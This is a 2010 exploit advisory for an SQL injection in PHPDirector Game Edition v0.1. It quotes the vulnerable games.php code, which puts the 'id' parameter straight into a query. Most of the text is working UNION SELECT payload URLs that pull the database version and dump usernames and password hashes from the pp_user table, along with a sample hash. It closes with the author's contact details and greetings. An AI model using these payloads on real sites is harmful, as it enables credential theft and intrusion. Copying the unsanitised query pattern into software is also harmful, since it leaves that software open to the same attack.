# Exploit Title: PHPDirector Game Edition SQL Injection Vulnerability (games.php) # Date: 2010-01-05 # Author: Zer0 Thunder # Site : http://www.play-online.bzh.be/forum/ # Software Link: http://www.play-online.bzh.be/forum/download/phpdirectorgameedition.zip # Version: v0.1 # Tested on: Windows XP sp2 [WampServer 2.0i ] / LinuxBox (Ubuntu Server) # CVE : # Code : Page : Games.php Vuln Page ----------------------------------------- if(isset($_GET['id'])) { $query_co = "SELECT * FROM pp_comment,pp_user WHERE pp_comment.nom = pp_user.user AND pp_comment.file_id=$_GET[id] ORDER BY pp_comment.id DESC"; $result_co = mysql_query($query_co); while ($row_co = mysql_fetch_assoc($result_co)){ $game_co[] = $row_co; } $smarty->assign('game_co', $game_co); } ----------------------------------- Exploit : http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- Example : DB Version http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- Users http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user-- ######################################## # # Note : When I did this SQL Injection The User Name And Password Appeared On the Title Bar so # Bens Videos - 1:test:098f6bcd4621d373cade4e832627b4f6 # View Open Source And Check the title # ######################################## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ######################################## # MSN : zer0_thunder@colombohackers.com # Email : neonwarlock@live.com # Site : LKHackers.com # Greetz : To all my friends # Note : Proud to be a Sri Lankan # Me : Sri Lankan Hacker ########################################